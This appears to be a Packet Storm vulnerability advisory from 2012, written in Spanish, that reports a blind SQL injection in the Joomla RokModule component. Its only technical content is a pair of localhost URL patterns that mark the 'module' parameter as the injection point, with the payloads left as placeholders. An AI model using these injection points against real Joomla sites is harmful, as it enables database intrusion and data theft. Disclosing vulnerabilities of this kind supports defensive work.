Joomla RokModule Blind SQL Injection

2012-09-10T00:00:00
ID PACKETSTORM:116393
Type packetstorm
Reporter Yarolinux
Modified 2012-09-10T00:00:00

Description

                                        
                                            `Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability  
  
Nombre del Componente: Com_rokmodule  
  
Empresa: http://www.rockettheme.com/  
  
Testeado: Linux Backtrack  
  
Autor: Yarolinux Para WebSecurityDev  
Twitter: @Yarolinux  
  
Fecha: 09/09/2012  
  
Bueno la Injeccion Va de la siguiente manera:  
  
http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]  
  
http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]  
  
  
Ok! Eso es todo Difrutenlo!  
  
Estamos trabajando en un laboratorio testeandolo en Joomla 1.7, Muy  
pronto resultados :D  
  
Greetz: Dylan Irzi & WebSecurityDev  
  
  
`